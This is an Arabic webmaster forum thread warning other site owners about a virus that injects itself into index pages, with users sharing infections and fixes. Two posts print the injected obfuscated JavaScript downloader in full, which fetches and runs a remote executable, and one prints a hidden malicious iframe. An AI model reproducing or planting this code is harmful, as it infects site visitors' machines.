[تحذير] فايروس يزرع نفسه تلقائيا بالـ index

**عبد الله الزايدي** · 06-02-2008

بسم الله الرحمن الرحيم

حبيت انبهكم يا اخوان واحذركم من فايروس يزرع نفسه تلقائي في صفحة الانديكس في المواقع

في موقعي مرتين يزرع نفسه واشيله .. ويرجع ثاني بعد كم يوم

اللي ظهر قدامي في الموقع هو تغير الكلمات العربيه الى رموز .. استغربت فتحت الصفحه شفت السورس الا في اخر الصفحة مزروع كود جافا سكربت وهو التالي :

كود PHP:


<script>

var dc=document.write;

var sc=String.fromCharCode;

var exe="http://h1.ripway.com/aappoopp/lol.exe";

dc(sc(60,115,99,114,105,112,116,62,118,97,114,32,97,105,108,105,97,110,44,122,104,97,110,44,99,109,100,115,115,59,97,105,108,105,97,110,61,34) + exe + sc(34,59,122,104,97,110,61,34,119,105,110,46,101,120,101,34,59,99,109,100,115,115,61,34,99,109,100,46,101,120,101,34,59,116,114,121,123,118,97,114,32,97,100,111,61,40,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,111,98,106,101,99,116,34,41,41,59,118,97,114,32,100,61,49,59,97,100,111,46,115,101,116,65,116,116,114,105,98,117,116,101,40,34,99,108,97,115,115,105,100,34,44,34,99,108,115,105,100,58,66,68,57,54,67,53,53,54,45,54,53,65,51,45,49,49,68,48,45,57,56,51,65,45,48,48,67,48,52,70,67,50,57,69,51,54,34,41,59,118,97,114,32,101,61,49,59,118,97,114,32,120,109,108,61,97,100,111,46,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,34,44,34,34,41,59,118,97,114,32,102,61,49,59,118,97,114,32,108,110,61,34,65,100,111,34,59,118,97,114,32,108,122,110,61,34,100,98,46,83,116,34,59,118,97,114,32,97,110,61,34,114,101,97,109,34,59,118,97,114,32,103,61,49,59,118,97,114,32,97,115,61,97,100,111,46,99,114,101,97,116,101,111,98,106,101,99,116,40,108,110,43,108,122,110,43,97,110,44,34,34,41,59,118,97,114,32,104,61,49,59,120,109,108,46,79,112,101,110,40,34,71,69,84,34,44,97,105,108,105,97,110,44,48,41,59,120,109,108,46,83,101,110,100,40,41,59,97,115,46,116,121,112,101,61,49,59,118,97,114,32,110,61,49,59,97,115,46,111,112,101,110,40,41,59,97,115,46,119,114,105,116,101,40,120,109,108,46,114,101,115,112,111,110,115,101,66,111,100,121,41,59,97,115,46,115,97,118,101,116,111,102,105,108,101,40,122,104,97,110,44,50,41,59,97,115,46,99,108,111,115,101,40,41,59,118,97,114,32,115,104,101,108,108,61,97,100,111,46,99,114,101,97,116,101,111,98,106,101,99,116,40,34,83,104,101,108,108,46,65,112,112,108,105,99,97,116,105,111,110,34,44,34,34,41,59,115,104,101,108,108,46,83,104,101,108,108,69,120,101,99,117,116,101,40,122,104,97,110,44,34,34,44,34,34,44,34,111,112,101,110,34,44,48,41,59,115,104,101,108,108,46,83,104,101,108,108,69,120,101,99,117,116,101,40,99,109,100,115,115,44,34,32,47,99,32,100,101,108,32,47,83,32,47,81,32,47,70,32,34,43,122,104,97,110,44,34,34,44,34,111,112,101,110,34,44,48,41,59,125,99,97,116,99,104,40,101,41,123,125,59,60,47,115,99,114,105,112,116,62));

</script>







    <head>

   <img border="0" src="http://www.xxx.com" 

    <hr>

    <!-- <script>location.href='http://google.com'</script> -->

ولاحظو رابط الـ exe وكمان رابط موقعي بالاخير بدل xxxx

ارجوا الانتباه والتشييك على صفحات موقعكم .. واحمد الله ان الصفحة ظهرت امامي كرموز والا ما كان انتبهت له

لان اتوقع لو قوقل اكتشفت الكود في صفحتك سوف يختم موقعك بالتحذير المعروف

اتمنى اللي يوصل لحل لمنع مثل هالاكواد من الزراعه التلقائية .. يخبرنا

مع التحية

**طلال عبدالله** · 07-02-2008

افضل حل من وجهة نظري هو معرفة كيفية وصول الكود الى الاندكس وغالبا عن طريق جهاز مدير الموقع وبالتالي يجب الحذر في الدخول على المواقع فانت لا تعرف مالذي ينزل في جهازك حينما تزور المواقع وبرامج الحماية اصبحت منظر فقط تستمع باصطياد فيروس انتشر منذ سنين عديدة ..

**عبد الله الزايدي** · 07-02-2008

هلا اخوي WavesGulf

شاكر لك مرورك الكريم اخوي

وحسب ما اطلعت عليه .. ان هالفايروس مو بيد مدير الموقع .. لانه منتشر في كثير من المواقع ويزرع نفسه تلقائيا في الصفحات مثل الـ index و home .. الخ

شاكر لك مرورك

مع التحية

**new4arab** · 07-02-2008

بكل اسف نفس المشكله حدثت علي جهازي امبارح وجدت فريم لموقع

في جميع ملفات السكربتات الموجوده في السيرفر الشخصي

كود PHP:


<iframe src="http://ntkrnlpa.info/rc/?i=1" width=1 height=1></iframe>

اتمنا حد يسعفنا بحل

ابو اسامه

**Mr.Ajax** · 07-02-2008

سيدى الفاضل
اذا لاحظت معى الكود تدريجيا

كود PHP:


<script> 
var dc=document.write; 
var sc=String.fromCharCode; 
var exe="http://h1.ripway.com/aappoopp/lol.exe"; 
dc(sc(60,115,99,114,105,112,116,62,118,97,114,32,97,105,108,105,97,110,44,122,104,97,110,44,99,109,100,115,115,59,97,105,108,105,97,110,61,34) + exe + sc(34,59,122,104,97,110,61,34,119,105,110,46,101,120,101,34,59,99,109,100,115,115,61,34,99,109,100,46,101,120,101,34,59,116,114,121,123,118,97,114,32,97,100,111,61,40,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,111,98,106,101,99,116,34,41,41,59,118,97,114,32,100,61,49,59,97,100,111,46,115,101,116,65,116,116,114,105,98,117,116,101,40,34,99,108,97,115,115,105,100,34,44,34,99,108,115,105,100,58,66,68,57,54,67,53,53,54,45,54,53,65,51,45,49,49,68,48,45,57,56,51,65,45,48,48,67,48,52,70,67,50,57,69,51,54,34,41,59,118,97,114,32,101,61,49,59,118,97,114,32,120,109,108,61,97,100,111,46,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,34,44,34,34,41,59,118,97,114,32,102,61,49,59,118,97,114,32,108,110,61,34,65,100,111,34,59,118,97,114,32,108,122,110,61,34,100,98,46,83,116,34,59,118,97,114,32,97,110,61,34,114,101,97,109,34,59,118,97,114,32,103,61,49,59,118,97,114,32,97,115,61,97,100,111,46,99,114,101,97,116,101,111,98,106,101,99,116,40,108,110,43,108,122,110,43,97,110,44,34,34,41,59,118,97,114,32,104,61,49,59,120,109,108,46,79,112,101,110,40,34,71,69,84,34,44,97,105,108,105,97,110,44,48,41,59,120,109,108,46,83,101,110,100,40,41,59,97,115,46,116,121,112,101,61,49,59,118,97,114,32,110,61,49,59,97,115,46,111,112,101,110,40,41,59,97,115,46,119,114,105,116,101,40,120,109,108,46,114,101,115,112,111,110,115,101,66,111,100,121,41,59,97,115,46,115,97,118,101,116,111,102,105,108,101,40,122,104,97,110,44,50,41,59,97,115,46,99,108,111,115,101,40,41,59,118,97,114,32,115,104,101,108,108,61,97,100,111,46,99,114,101,97,116,101,111,98,106,101,99,116,40,34,83,104,101,108,108,46,65,112,112,108,105,99,97,116,105,111,110,34,44,34,34,41,59,115,104,101,108,108,46,83,104,101,108,108,69,120,101,99,117,116,101,40,122,104,97,110,44,34,34,44,34,34,44,34,111,112,101,110,34,44,48,41,59,115,104,101,108,108,46,83,104,101,108,108,69,120,101,99,117,116,101,40,99,109,100,115,115,44,34,32,47,99,32,100,101,108,32,47,83,32,47,81,32,47,70,32,34,43,122,104,97,110,44,34,34,44,34,111,112,101,110,34,44,48,41,59,125,99,97,116,99,104,40,101,41,123,125,59,60,47,115,99,114,105,112,116,62)); 
</script>

http://h1.ripway.com/aappoopp/lol.exe
وهذا يمثل باتش مزروع هذا الباتش له امكانيه أن يتخطى الكاسبر سكاى فى بعض الأحيان والفايروول
ويزرع نفسه فى جهاز الضحيه

أعتقد أن حل هذه المشكله هو تنصيب كاسبر سكاى على جهازك

وتحديثه بأخر أبديت
وحذف تلك السطور من ملفاتك يدويا
ولا تحاول أن تجعل الكاسبر يحذفها لأنه من الممكن أن يحذف ملفاتك الخاصه

تحياتى
Mr.Ajax

**فرح** · 07-02-2008

انا سبق وعانيت منه

الحل الى عملته فورمات للجهاز + تغيير ارقام المواقع المصابة
مع ازالة الاكواد يدويا او اعادة رفع صفحات index المصابة
لانه هناك من اخترق الجهاز وصار يرسل الاكواد بشكل يومي تقريبا

وتخلصت منه نهائي

جربته على اكثر من موقع

**أحمد ماستر** · 07-02-2008

http://www.swalif.net/softs/swalif48/softs218292/

موضوع ذات صلـة ,,

**4rsan.net** · 08-02-2008

السلام عليكم
المشكلة ليست فى موقعك بل السيرفر الذى عليه ما هى الداتا السنتر و ليس المستضيف
المشكلة فى تنقلة فى السيرفرات و هذه المشكلة تم التحدث عنها فى موقع السى بنل و ايضا مجلة بى سى
و الكثير من المواقع الاجنبية

عموما الحل هو ان يرجع المستضيف الى الداتا سنتر و يشوف ايه الحلول اللى مطروحة من عندهم

تحياتى
فارس العرب

**Downloadiz2.com** · 09-02-2008

كنت اعانى من هذة المشكلة ،، و حلها هوة عمل فورمات للجهاز اولا ،، ثم بعد ذلك ارجاع باك اب قديم للملفات فقط ،، و الله ييكون فى عوننا ،،

الموضوع: [تحذير] فايروس يزرع نفسه تلقائيا بالـ index

أدوات الموضوع

بحث في الموضوع

[تحذير] فايروس يزرع نفسه تلقائيا بالـ index

المواضيع المتشابهه

تحذير لكل من تسول له نفسه محاولة بيع برامجنا

موقعي فيه فايروس اشيله يرجع من نفسه 000

تحذير عن فايروس جديد ,, يرجى الدخول للأهمية

ضوابط المشاركة